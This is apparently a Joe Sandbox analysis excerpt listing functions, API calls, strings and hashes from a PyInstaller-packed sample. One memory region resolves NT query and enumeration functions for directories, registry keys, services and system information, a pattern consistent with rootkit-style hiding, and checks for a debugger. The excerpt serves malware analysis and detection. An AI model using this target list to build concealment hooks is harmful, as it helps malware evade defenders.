Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
Instruction ID: 5e72373508a4bba72236e84f7b612d189d3d5744653ba276468c9bc2491bad90
Opcode Fuzzy Hash: bb049028caba5e04dba667320418798f18563eb801bd7df1d5910388d10efff1
Instruction Fuzzy Hash: 4B015E20A0968342FEA0BAA56F42579A2F0EF47794F940634F96C4A7D6DF2CE4534A20

Function 00007FF72727DEA8 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FF72727A63A,?,?,?,00007FF7272743FD,?,?,?,?,00007FF72727979A), ref: 00007FF72727DEFD

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
Instruction ID: 114ca06323a254dc4f7067b128627bfdcc1ab94daf40c3132fcc84fc8d94828e
Opcode Fuzzy Hash: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
Instruction Fuzzy Hash: 96F04900B0A24781FE5976639F113B592F0DFAAB80FC84430C90E8A2D5DF2CA8838A31

Function 00007FF72727C90C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FF72726FFB0,?,?,?,00007FF72727161A,?,?,?,?,?,00007FF727272E09), ref: 00007FF72727C94A

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
Instruction ID: bec86a908da41ac9107fb9c9a6255de3528cbf0712982d904a3a0e3fdd8e9478
Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
Instruction Fuzzy Hash: C4F05E00F1A24785FE9476715F1137591E4DF4A7A0F881630D82E8A2C1EF2CE6838930

Function 00007FF727277548 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF727277561

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
Instruction ID: a450e3f066fd1b5554a5a4bd2bc1a27e63ce2282856cd499c501bfd8bae8fd61
Opcode Fuzzy Hash: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
Instruction Fuzzy Hash: BDE0B690E4824782FA247AA84F82679A1B0DF6A340FD05030D9484E383DF2C78469A31

Function 000001F91B35273C Relevance: 1.4, APIs: 1, Instructions: 187memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 000001F91B3527DB

Memory Dump Source

Source File: 00000002.00000002.2421140533.000001F91B350000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b350000_based.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction ID: e5f809cb6a5ee8dc7b1d6a5f5442ecb9273552bfb423fdfab4456d07e3d3da51
Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction Fuzzy Hash: C661F072B0A69687DB54AF1598007BDB3A3FB54BA4F5C8131EE5907788DA38E873C700

Non-executed Functions

Function 000001F91B327D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001F91B327DAC
RtlCaptureContext.NTDLL ref: 000001F91B327DD9
RtlLookupFunctionEntry.NTDLL ref: 000001F91B327DF3
RtlVirtualUnwind.NTDLL ref: 000001F91B327E34
IsDebuggerPresent.KERNEL32 ref: 000001F91B327E88
SetUnhandledExceptionFilter.KERNEL32 ref: 000001F91B327EA9
UnhandledExceptionFilter.KERNEL32 ref: 000001F91B327EB4

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction ID: 165fded862357c49b229c2374806ae23b177be964f72ff61f05ec585c09f46a0
Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction Fuzzy Hash: 3C31617230AB828AEB60AF60E8803EE7361F784754F484039EA4D47BA4EF38C559C710

Function 00007FF727284F10 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF727284F55

Part of subcall function 00007FF7272848A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7272848BC

Part of subcall function 00007FF727279C58: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF727282032,?,?,?,00007FF72728206F,?,?,00000000,00007FF727282535,?,?,?,00007FF727282467), ref: 00007FF727279C6E
Part of subcall function 00007FF727279C58: GetLastError.KERNEL32(?,?,?,00007FF727282032,?,?,?,00007FF72728206F,?,?,00000000,00007FF727282535,?,?,?,00007FF727282467), ref: 00007FF727279C78

Part of subcall function 00007FF727279C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF727279BEF,?,?,?,?,?,00007FF727279ADA), ref: 00007FF727279C19
Part of subcall function 00007FF727279C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF727279BEF,?,?,?,?,?,00007FF727279ADA), ref: 00007FF727279C3E

_get_daylight.LIBCMT ref: 00007FF727284F44

Part of subcall function 00007FF727284908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72728491C

_get_daylight.LIBCMT ref: 00007FF7272851BA
_get_daylight.LIBCMT ref: 00007FF7272851CB
_get_daylight.LIBCMT ref: 00007FF7272851DC
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72728541C), ref: 00007FF727285203

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLanguagesLastPreferredPresentProcessProcessorRestoreThreadTimeZone
String ID:
API String ID: 1458651798-0
Opcode ID: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
Instruction ID: 0d88eb118e69619478ba05f88d670711572bdd92cb16d24e79001e238e4aaf3d
Opcode Fuzzy Hash: 0d3b627969e88128c8faa99a2c0e5d438b7f33ec3044a67c5b643e0657b8cf50
Instruction Fuzzy Hash: B9D1A126E0826286E720BF22DE401B9A7F6EF46794FC44135EA4D87685DF3DE442CB70

Function 000001F91B32D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000001F91B32D31D
RtlLookupFunctionEntry.NTDLL ref: 000001F91B32D335
RtlVirtualUnwind.NTDLL ref: 000001F91B32D370
IsDebuggerPresent.KERNEL32 ref: 000001F91B32D3A9
SetUnhandledExceptionFilter.KERNEL32 ref: 000001F91B32D3B3
UnhandledExceptionFilter.KERNEL32 ref: 000001F91B32D3BE

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
Instruction ID: aedab5b534363bc5524e5b5ead437ee367f015d2dffc3019cb1706de4066e196
Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
Instruction Fuzzy Hash: 07317532219F828ADB60DF25E8403EE73A5F7897A4F540135EA9D43BA8DF38C556CB00

Function 00007FF7272650B0 Relevance: 157.9, APIs: 44, Strings: 46, Instructions: 364libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF727265C57,?,00007FF72726308E), ref: 00007FF7272650C0
GetProcAddress.KERNEL32(?,00007FF727265C57,?,00007FF72726308E), ref: 00007FF727265101
GetProcAddress.KERNEL32(?,00007FF727265C57,?,00007FF72726308E), ref: 00007FF727265126
GetProcAddress.KERNEL32(?,00007FF727265C57,?,00007FF72726308E), ref: 00007FF72726514B
GetProcAddress.KERNEL32(?,00007FF727265C57,?,00007FF72726308E), ref: 00007FF727265173
GetProcAddress.KERNEL32(?,00007FF727265C57,?,00007FF72726308E), ref: 00007FF72726519B
GetProcAddress.KERNEL32(?,00007FF727265C57,?,00007FF72726308E), ref: 00007FF7272651C3
GetProcAddress.KERNEL32(?,00007FF727265C57,?,00007FF72726308E), ref: 00007FF7272651EB
GetProcAddress.KERNEL32(?,00007FF727265C57,?,00007FF72726308E), ref: 00007FF727265213

Strings

PyMarshal_ReadObjectFromString, xrefs: 00007FF727265489, 00007FF7272654A5
PyUnicode_FromFormat, xrefs: 00007FF727265709, 00007FF727265725
PyUnicode_AsUTF8, xrefs: 00007FF727265691, 00007FF7272656AD
PySys_SetObject, xrefs: 00007FF727265669, 00007FF727265685
PyUnicode_Decode, xrefs: 00007FF7272656B9, 00007FF7272656D5
PyModule_GetDict, xrefs: 00007FF7272654D9, 00007FF7272654F5
PyObject_GetAttrString, xrefs: 00007FF727265551, 00007FF72726556D
PyConfig_InitIsolatedConfig, xrefs: 00007FF727265209, 00007FF727265225
PyErr_Restore, xrefs: 00007FF727265399, 00007FF7272653B5
PyObject_Str, xrefs: 00007FF7272655A1, 00007FF7272655BD
Py_IsInitialized, xrefs: 00007FF727265191, 00007FF7272651AD
Py_InitializeFromConfig, xrefs: 00007FF727265169, 00007FF727265185
PyConfig_SetBytesString, xrefs: 00007FF727265259, 00007FF727265275
PyErr_Clear, xrefs: 00007FF7272652D1, 00007FF7272652ED
PyConfig_SetWideStringList, xrefs: 00007FF7272652A9, 00007FF7272652C5
PyImport_ImportModule, xrefs: 00007FF727265439, 00007FF727265455
PyObject_SetAttrString, xrefs: 00007FF727265579, 00007FF727265595
PyImport_ExecCodeModule, xrefs: 00007FF727265411, 00007FF72726542D
PyObject_CallFunction, xrefs: 00007FF727265501, 00007FF72726551D
PyImport_AddModule, xrefs: 00007FF7272653E9, 00007FF727265405
PyMem_RawFree, xrefs: 00007FF7272654B1, 00007FF7272654CD
PyConfig_Clear, xrefs: 00007FF7272651E1, 00007FF7272651FD
PyErr_Occurred, xrefs: 00007FF727265349, 00007FF727265365
Py_Finalize, xrefs: 00007FF727265141, 00007FF72726515D
PyErr_Print, xrefs: 00007FF727265371, 00007FF72726538D
Failed to get address for %hs, xrefs: 00007FF7272650D9
Py_DecodeLocale, xrefs: 00007FF7272650F7, 00007FF727265113
PyUnicode_FromString, xrefs: 00007FF727265731, 00007FF72726574D
PyConfig_Read, xrefs: 00007FF727265231, 00007FF72726524D
PyUnicode_DecodeFSDefault, xrefs: 00007FF7272656E1, 00007FF7272656FD
PyErr_NormalizeException, xrefs: 00007FF727265321, 00007FF72726533D
PyList_Append, xrefs: 00007FF727265461, 00007FF72726547D
Py_DecRef, xrefs: 00007FF7272650B6, 00007FF7272650D2
PyEval_EvalCode, xrefs: 00007FF7272653C1, 00007FF7272653DD
Py_PreInitialize, xrefs: 00007FF7272651B9, 00007FF7272651D5
PyErr_Fetch, xrefs: 00007FF7272652F9, 00007FF727265315
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF7272655C9, 00007FF7272655E5
PySys_GetObject, xrefs: 00007FF727265641, 00007FF72726565D
PyStatus_Exception, xrefs: 00007FF727265619, 00007FF727265635
GetProcAddress, xrefs: 00007FF7272650E0
PyUnicode_Replace, xrefs: 00007FF727265781, 00007FF72726579D
PyRun_SimpleStringFlags, xrefs: 00007FF7272655F1, 00007FF72726560D
PyConfig_SetString, xrefs: 00007FF727265281, 00007FF72726529D
PyObject_CallFunctionObjArgs, xrefs: 00007FF727265529, 00007FF727265545
Py_ExitStatusException, xrefs: 00007FF72726511C, 00007FF727265138
PyUnicode_Join, xrefs: 00007FF727265759, 00007FF727265775

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 190572456-2007157414
Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
Instruction ID: 18540e86d36fc129105e775678c1774e032f9ee213a25653d8f3f94597ffde1f
Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
Instruction Fuzzy Hash: D312D96090BB5390FA15BB05BF101B0A3F4EF0B750FD4657AC91E512A1EF3EB58A9A70

Function 00007FF727266EA0 Relevance: 119.3, APIs: 33, Strings: 35, Instructions: 280libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF727266EB7
GetProcAddress.KERNEL32 ref: 00007FF727266EFD
GetProcAddress.KERNEL32 ref: 00007FF727266F22
GetProcAddress.KERNEL32 ref: 00007FF727266F47
GetProcAddress.KERNEL32 ref: 00007FF727266F6F
GetProcAddress.KERNEL32 ref: 00007FF727266F97
GetProcAddress.KERNEL32 ref: 00007FF727266FBF
GetProcAddress.KERNEL32 ref: 00007FF727266FE7
GetProcAddress.KERNEL32 ref: 00007FF72726700F

Strings

Tcl_MutexFinalize, xrefs: 00007FF7272670A5, 00007FF7272670C1
Tcl_Init, xrefs: 00007FF727266EB0, 00007FF727266EC9
Tk_GetNumMainWindows, xrefs: 00007FF7272673C5, 00007FF7272673E1
Tcl_MutexUnlock, xrefs: 00007FF72726707D, 00007FF727267099
Tcl_EvalFile, xrefs: 00007FF7272672D5, 00007FF7272672F1
Tcl_ConditionWait, xrefs: 00007FF72726711D, 00007FF727267139
Tcl_EvalObjv, xrefs: 00007FF727267325, 00007FF727267341
Tcl_CreateThread, xrefs: 00007FF727266FDD, 00007FF727266FF9
Tcl_ConditionNotify, xrefs: 00007FF7272670F5, 00007FF727267111
Tcl_SetVar2, xrefs: 00007FF7272671BD, 00007FF7272671D9
Tcl_ConditionFinalize, xrefs: 00007FF7272670CD, 00007FF7272670E9
Tcl_GetVar2, xrefs: 00007FF727267195, 00007FF7272671B1
Tcl_GetObjResult, xrefs: 00007FF7272672AD, 00007FF7272672C9
Tcl_CreateObjCommand, xrefs: 00007FF7272671E5, 00007FF727267201
Tcl_Finalize, xrefs: 00007FF727266F65, 00007FF727266F81
Tcl_ThreadAlert, xrefs: 00007FF72726716D, 00007FF727267189
Tcl_NewStringObj, xrefs: 00007FF727267235, 00007FF727267251
Tcl_ThreadQueueEvent, xrefs: 00007FF727267145, 00007FF727267161
Failed to get address for %hs, xrefs: 00007FF727266ED0
Tcl_GetCurrentThread, xrefs: 00007FF727267005, 00007FF727267021
Tcl_NewByteArrayObj, xrefs: 00007FF72726725D, 00007FF727267279
Tcl_SetVar2Ex, xrefs: 00007FF727267285, 00007FF7272672A1
Tcl_JoinThread, xrefs: 00007FF72726702D, 00007FF727267049
Tcl_EvalEx, xrefs: 00007FF7272672FD, 00007FF727267319
Tcl_MutexLock, xrefs: 00007FF727267055, 00007FF727267071
Tcl_DoOneEvent, xrefs: 00007FF727266F3D, 00007FF727266F59
GetProcAddress, xrefs: 00007FF727266ED7
Tcl_Free, xrefs: 00007FF727267375, 00007FF727267391
Tcl_FindExecutable, xrefs: 00007FF727266F18, 00007FF727266F34
Tcl_GetString, xrefs: 00007FF72726720D, 00007FF727267229
Tcl_CreateInterp, xrefs: 00007FF727266EF3, 00007FF727266F0F
Tcl_Alloc, xrefs: 00007FF72726734D, 00007FF727267369
Tk_Init, xrefs: 00007FF72726739D, 00007FF7272673B9
Tcl_DeleteInterp, xrefs: 00007FF727266FB5, 00007FF727266FD1
Tcl_FinalizeThread, xrefs: 00007FF727266F8D, 00007FF727266FA9

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 190572456-3427451314
Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
Instruction ID: 9f4d78c090ae19d138f79111286f0083da7d397685eaf23d8990458eab216d70
Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
Instruction Fuzzy Hash: 9DE1C864919B4391FA14BB15BF005B4E3F1EF0A760FD8513AC81D823A5EF3EB54A9A70

Function 000001F91B3212BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001F91B321319
GetProcessHeap.KERNEL32 ref: 000001F91B321327
HeapAlloc.KERNEL32 ref: 000001F91B321338
RegEnumValueW.ADVAPI32 ref: 000001F91B321397

Part of subcall function 000001F91B32152C: StrCmpIW.SHLWAPI ref: 000001F91B32155D

GetProcessHeap.KERNEL32 ref: 000001F91B3213DF
HeapAlloc.KERNEL32 ref: 000001F91B3213ED
GetProcessHeap.KERNEL32 ref: 000001F91B32140A
HeapFree.KERNEL32 ref: 000001F91B321418
lstrlenW.KERNEL32 ref: 000001F91B321421
GetProcessHeap.KERNEL32 ref: 000001F91B32142F
HeapAlloc.KERNEL32 ref: 000001F91B32143D
StrCpyW.SHLWAPI ref: 000001F91B32145F
GetProcessHeap.KERNEL32 ref: 000001F91B321476
HeapFree.KERNEL32 ref: 000001F91B321484

Strings

d, xrefs: 000001F91B32135A

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
Instruction ID: 47775d3dd0e5d47ce93f6b1e5424105503f5857ad38b65448786ae5747e87bb0
Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
Instruction Fuzzy Hash: F4513C36619B878AEB54DF62E5443AA77A2F789BE5F084134EE4907768DF3CC066C700

Function 00007FF7272677D0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7272686B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF727263FA4,00000000,00007FF727261925), ref: 00007FF7272686E9

ExpandEnvironmentStringsW.KERNEL32(?,00007FF727267C97,?,?,FFFFFFFF,00007FF727263834), ref: 00007FF72726782C

Part of subcall function 00007FF7272626C0: MessageBoxW.USER32 ref: 00007FF727262736

Strings

CreateDirectory, xrefs: 00007FF727267974
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF72726796D
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF7272678D9
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF72726789D
\, xrefs: 00007FF727267861
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF727267840
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF727267803
%.*s, xrefs: 00007FF72726790C

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
Instruction ID: 0d1bd7e15d648015f3e74c43c7d04d87f4c414f0374a9cc1757366ecd09ca309
Opcode Fuzzy Hash: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
Instruction Fuzzy Hash: 3541B311A1964381FA50BB21EE516BAF2F1EF46784FC4943BD54E82695FF2CE5068F30

Function 000001F91B321D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001F91B321D1F

Part of subcall function 000001F91B321FD4: GetModuleHandleA.KERNEL32 ref: 000001F91B321FEC
Part of subcall function 000001F91B321FD4: GetProcAddress.KERNEL32 ref: 000001F91B321FFD

Part of subcall function 000001F91B325B30: GetCurrentThreadId.KERNEL32 ref: 000001F91B325B6B

Strings

EnumServicesStatusExW, xrefs: 000001F91B321E11, 000001F91B321E32
EnumServiceGroupW, xrefs: 000001F91B321DF0
NtEnumerateValueKey, xrefs: 000001F91B321DD6
ntdll.dll, xrefs: 000001F91B321D2D
sechost.dll, xrefs: 000001F91B321E39
NtQuerySystemInformation, xrefs: 000001F91B321D45
NtDeviceIoControlFile, xrefs: 000001F91B321E56
NtQueryDirectoryFileEx, xrefs: 000001F91B321D9C
NtResumeThread, xrefs: 000001F91B321D62
NtEnumerateKey, xrefs: 000001F91B321DB9
advapi32.dll, xrefs: 000001F91B321DF7, 000001F91B321E18
NtQueryDirectoryFile, xrefs: 000001F91B321D7F

